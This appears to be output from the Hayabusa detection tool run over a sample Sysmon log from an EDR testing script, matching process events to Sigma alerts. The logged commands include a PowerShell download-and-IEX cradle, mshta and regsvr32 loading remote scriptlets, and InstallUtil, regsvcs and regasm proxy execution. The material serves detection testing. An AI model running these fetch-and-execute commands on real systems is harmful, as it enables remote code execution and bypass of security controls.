2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 747F3D96-6638-5D3F-0000-00103DA88900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4632 | PGUID: 747F3D96-6638-5D3F-0000-001022AA8900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 747F3D96-6638-5D3F-0000-001067BA8900,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
